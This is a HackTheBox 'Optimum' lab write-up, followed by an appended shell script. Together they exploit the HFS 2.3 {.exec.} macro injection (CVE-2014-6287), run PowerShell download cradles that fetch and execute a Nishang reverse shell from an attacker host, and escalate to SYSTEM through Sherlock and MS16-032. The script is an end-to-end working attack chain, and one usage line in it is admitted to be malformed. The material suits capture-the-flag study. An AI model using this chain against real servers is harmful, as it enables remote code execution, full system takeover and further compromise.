HTB Optimum Write-up (Windows) - Powershell Download String, HFS File Server 2.3 Vuln, Sherlock
What I learned:
1 liner
HTTP Enum:
HttpFileServer 2.3
Searchsploit result:
https://www.exploit-db.com/exploits/49584
This exploit worked, but IppSec's walkthrough video does it in a better way, and that is the method described below.
HFS (HttpFileServer) is written by rejetto and has its own macro language, which the server expands inside certain request parameters.
Version 2.3 (before 2.3c, CVE-2014-6287) is vulnerable to remote code execution: a null byte (%00) in the search parameter gets a macro past the check that would otherwise reject it, and the {.exec.} macro runs an arbitrary command on the server.
According to the HFS wiki page, we can execute a command with the following syntax:
We can confirm this by sending a request that pings our attacking machine:
and running tcpdump on the attacking machine to catch the ICMP echo requests, which proves that the command executed:
If the pings arrive, the server is exploitable.
64-bit Windows ships both 32-bit and 64-bit copies of its system binaries, and which copy a path resolves to depends on the bitness of the process doing the lookup:
C:\Windows\System32 -> the 64-bit binaries for a 64-bit process, but a 32-bit process (such as HFS) is transparently redirected to SysWOW64 when it uses this path
C:\Windows\SysWOW64 -> the 32-bit binaries
C:\Windows\SysNative -> an alias, visible only to 32-bit processes, that reaches the real 64-bit System32
So to get a 64-bit PowerShell out of the 32-bit HFS process, we use the SysNative path.
To test that the ping also works through PowerShell (replace IP with the attacking machine's address):
http://10.129.1.127/?search=%00{.exec|c:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe ping IP.}
Once confirmed, we can use the reverse shell from the "Nishang" toolset, Shells > Invoke-PowerShellTcp.ps1. Copy it somewhere else, because it needs a small modification.
At the end of the script, we need to add one line that invokes the reverse shell:
Then start nc listening on the port specified in that line.
Finally, make the file server download and execute the script by issuing:
And now we get the user shell!
The same download-and-execute method can also fetch privilege-escalation scripts.
---
Priv Esc
Since we are already running PowerShell on the server, let's use Sherlock, a PowerShell script that checks for missing patches with known local exploits.
Edit the Sherlock script and append the function we want to run at the end of the file:
In this case, Find-AllVulns.
Sherlock reports three missing patches with public exploits:
MS16-032, MS16-034, MS16-135
Try MS16-032.
At the end of the exploit script, append:
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://192.168.119.188:80/shell.ps1')"
Copy the Nishang TCP reverse-shell script into the same directory as shell.ps1, change its port to something other than the one used for the first shell, and start the Python HTTP server to host both files.
Start nc on the new port before running the exploit.
It worked!
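The attacker-side part of the chain above, both the initial foothold (the download cradle fed to the HFS {.exec.} macro, pulling the Nishang reverse shell) and the privesc stage (the same cradle handed to Invoke-MS16032), as an added example. This is not code from the write-up, the exploit-db entry, HFS, Nishang or Sherlock; it assumes an attacking address of 10.10.14.2 and reverse-shell ports 443 and 4444, and takes the 64-bit PowerShell path from the write-up.

```shell
#!/usr/bin/env sh
# Added example (not from the write-up): attacker-side helpers for the HFS 2.3
# {.exec.} macro injection. Assumed values: ATTACKER is your tun0 address;
# the ports in the usage comment are arbitrary picks.

ATTACKER='10.10.14.2'     # assumption: attacking machine's address
PS64='c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe'

# Percent-encode everything except RFC 3986 unreserved characters, so spaces,
# backslashes, quotes and parentheses in the command survive the query string.
# Single-byte loop: fine for the ASCII commands used here (no newlines).
urlencode() {
  s=$1; out=''
  while [ -n "$s" ]; do
    c=$(printf '%.1s' "$s")      # first character
    s=${s#?}                     # drop it from the remainder
    case "$c" in
      [a-zA-Z0-9.~_-]) out="$out$c" ;;
      *) out="$out$(printf '%%%02X' "'$c")" ;;   # 'X -> ASCII code of X
    esac
  done
  printf '%s' "$out"
}

# Injection URL: %00 ends the search string so the remainder is treated as a
# macro, and {.exec|<cmd>.} runs <cmd>. The command must not itself contain
# '|' or '.}', which HFS reads as macro delimiters.
hfs_exec_url() {
  # $1 = host[:port], $2 = Windows command line
  printf 'http://%s/?search=%%00{.exec|%s.}' "$1" "$(urlencode "$2")"
}

# Download cradle through the 64-bit PowerShell (SysNative, so the 32-bit HFS
# process does not get redirected to SysWOW64): fetch $1 from our web root
# and run it in memory.
ps_cradle() {
  printf "%s IEX(New-Object Net.WebClient).DownloadString('http://%s/%s')" \
    "$PS64" "$ATTACKER" "$1"
}

# Copy Nishang's Invoke-PowerShellTcp.ps1 and append the call that makes it
# connect back when loaded. $1 = source script, $2 = output file, $3 = port.
stage_nishang() {
  cp "$1" "$2"
  printf '\nInvoke-PowerShellTcp -Reverse -IPAddress %s -Port %s\n' \
    "$ATTACKER" "$3" >> "$2"
}

# Copy Invoke-MS16032.ps1 and append a call that runs a second cradle as
# SYSTEM. $1 = source script, $2 = output file, $3 = name of the hosted
# reverse-shell script (staged with stage_nishang on a different port).
stage_ms16032() {
  cp "$1" "$2"
  printf "\nInvoke-MS16032 -Command \"IEX(New-Object Net.WebClient).DownloadString('http://%s/%s')\"\n" \
    "$ATTACKER" "$3" >> "$2"
}

# Fire one request. HFS answers quickly and the command runs in the
# background, so verify out of band: tcpdump for the ping, nc for the shell.
hfs_exec() {
  curl -s -o /dev/null --max-time 10 "$(hfs_exec_url "$1" "$2")"
}

# Typical run against the box (needs the target, a web server and listeners):
#   stage_nishang nishang/Shells/Invoke-PowerShellTcp.ps1 www/rev.ps1 443
#   stage_nishang nishang/Shells/Invoke-PowerShellTcp.ps1 www/shell.ps1 4444
#   stage_ms16032 Invoke-MS16032.ps1 www/ms16032.ps1 shell.ps1
#   (cd www && python3 -m http.server 80) &
#   nc -lvnp 443 ; nc -lvnp 4444            # in separate terminals
#   hfs_exec 10.129.1.127 "$(ps_cradle ping%20$ATTACKER)"   # sanity check first
#   hfs_exec 10.129.1.127 "$(ps_cradle rev.ps1)"           # user shell on 443
#   # then, inside the user shell, load ms16032.ps1 the same way to get the
#   # SYSTEM shell on 4444.
```

The sanity-check line in the usage comment is only there to show the shape of a request; for the ping test use hfs_exec with the raw ping command (as in the write-up) rather than the cradle. Everything the server is asked to run goes through urlencode, so the backslashes and quotes in the PowerShell cradle do not get mangled by the query string.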